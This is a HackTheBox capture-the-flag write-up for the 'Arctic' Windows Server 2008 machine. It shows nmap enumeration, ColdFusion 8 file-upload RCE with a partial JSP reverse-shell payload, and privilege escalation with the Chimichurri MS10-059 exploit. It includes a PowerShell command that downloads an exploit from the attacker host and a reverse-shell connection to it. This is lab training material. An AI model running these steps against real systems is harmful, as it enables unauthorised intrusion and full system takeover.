Arctic is a HackTheBox easy Microsoft Windows Server 2008 machine that is running Adobe ColdFusion 8. The initial foothold involves exploiting an unauthenticated file upload on the legacy web application. The privilege escalation involves abusing token impersonation privileges on an unpatched Windows Server build to achieve full administrative access.
1. Initial Enumeration and Service Discovery
As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O arctic.htb -oN nmap_scan to scan the open ports and services.
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-18 07:09 -0400 Nmap scan report for arctic.htb (10.129.3.136) Host is up (0.49s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open http JRun Web Server |_http-title: Index of / 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 2008|7|11|Phone|Vista|2012 (91%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_server_2012:r2 Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Embedded Standard 7 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 228.50 seconds
Based on the NMAP scan results, the target machine has 3 ports open.
- Port 135 - Microsoft Windows RPC
- Port 8500 - Running a JRun Web Server
- Port 49154 - Another Microsoft Windows RPC service
By enumerating the web service running on port 8500, I discovered that the browser is displaying the open directory listing. Further enumeration revealed an Adobe ColdFusion 8 administration directory at http://arctic.htb:8500/CFIDE/administrator/.
2. Initial Access - Adobe ColdFusion 8 RCE
Searching for publicly available exploits for Adobe ColdFusion 8, I found that ExploitDB has an unauthenticated arbitrary file upload vulnerability that can be used to get Remote Code Execution(RCE) on the target machine.
Adobe ColdFusion 8 - Remote Command Execution (RCE)
Generating a payload... Payload size: 1497 bytes Saved as: 4c338019e54e479aa8fe2a61f46bc925.jsp Priting request... Content-type: multipart/form-data; boundary=72167926f6e6419e84c03de28dc7fddb Content-length: 1698 --72167926f6e6419e84c03de28dc7fddb Content-Disposition: form-data; name="newfile"; filename="4c338019e54e479aa8fe2a61f46bc925.txt" Content-Type: text/plain <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> . . . connect to [10.10.16.36] from (UNKNOWN) [10.129.3.136] 49386 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\ColdFusion8\runtime\bin>whoami whoami arctic\tolis C:\ColdFusion8\runtime\bin> C:\ColdFusion8\runtime\bin>cd C:\Users\tolis\Desktop cd C:\Users\tolis\Desktop C:\Users\tolis\Desktop>type user.txt type user.txt
By editing and running the exploit, I was able to get a foothold as arctic\tolis on the target machine.
3. Privilege Escalation - SeImpersonatePrivilege & Chimichurri
3.1 Local System Enumeration
After establishing a foothold, I started to enumerate the target machine to find a way to escalate privileges. I started by running systeminfo to get an understanding of the OD version, build and installed security patches.
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 18/8/2026, 9:55:57 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 5.092 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.256 MB
Virtual Memory: In Use: 1.029 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.10.10.2
IP address(es)
[01]: 10.129.3.136Based on the results, the target machine is running Microsoft Windows Server 2008 R2 Standard Build 7600 with no hotfixes installed. This means it is highly likely that the OS has unpatched vulnerabilities.
Next, I inspected the user privileges my current user arctic\tolis has on the target machine by running whoami /all.
whoami /all USER INFORMATION ---------------- User Name SID ============ ============================================= arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000 GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I noticed the user has the SeImpersonatePrivilege privilege enabled. In theory, by combining the unpatched operating system and this enabled privilege, I should be able to escalate privileges.
3.2 Privilege Escalation Path Identification
To identify the privilege escalation paths, I used Windows Exploit Suggester - Next Generation (WES-NG).
CVE: CVE-2010-2554 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: https://exploit-db.com/exploits/14610 -- CVE: CVE-2010-4398 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://isc.sans.edu/diary.html?storyid=9988, http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/ -- CVE: CVE-2010-3338 KB: KB2305420 Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: https://exploit-db.com/exploits/19930, https://exploit-db.com/exploits/15589 -- CVE: CVE-2011-0045 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: https://exploit-db.com/exploits/16262 -- CVE: CVE-2013-0008 KB: KB2778930 Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: https://exploit-db.com/exploits/24485, https://exploit-db.com/exploits/27296 -- CVE: CVE-2012-0217 KB: KB2709715 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: https://exploit-db.com/exploits/20861 -- CVE: CVE-2011-1984 KB: KB2571621 Title: Vulnerability in WINS Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: https://exploit-db.com/exploits/17831
I decided to use the Microsoft Windows - Tracing Registry Key ACL Privilege Escalation exploit from Exploit DB, CVE-2010-2554(MS10-059).
3.3 How MS10-059(Chimichurri) Works
For the Chimichurri exploit to successfully escalate privileges, it needs to be executed by a user who has SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) privilege granted.
Windows assigns SeImpersonatePrivilege to administrative and service accounts so they can act on behalf of other client users or system components. When enabled, a process holding this privilege can capture and impersonate security tokens belonging to any process or client that connects to it.
In Windows Server 2008 R2, the Windows Service Tracing mechanism uses registry entries to define log files for active system services. Because these registry keys suffer from weak permission configurations, an unprivileged user holding SeImpersonatePrivilege can modify the tracing registry paths to point toward a local loopback socket managed by an exploit.
3.4 Privilege Escalation
I was able to find already compiled binary MS10-059: Chimichurri and transferred it to the target machine.
powershell -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.36:8000/Chimichurri.exe', 'C:\Users\tolis\Desktop\Chimichurri.exe')"As explained in the screenshot , the Chimichurri.exe creates a reverse shell connection, and I need to catch the reverse shell connection from my attacker machine.
C:\Users\tolis\Desktop>.\Chimichurri.exe 10.10.16.36 4445 .\Chimichurri.exe 10.10.16.36 4445 /Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
C:\Users\tolis\Desktop>
listening on [any] 4445 ... connect to [10.10.16.36] from (UNKNOWN) [10.129.3.136] 49746 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\tolis\Desktop>whoami whoami nt authority\system C:\Users\tolis\Desktop>cd ../../Administrator/Desktop cd ../../Administrator/Desktop C:\Users\Administrator\Desktop>type root.txt type root.txt
I was able to catch the reverse shell as nt authority\system and access the root flag.
Congrats! We found both flags!
HTB Machine Completion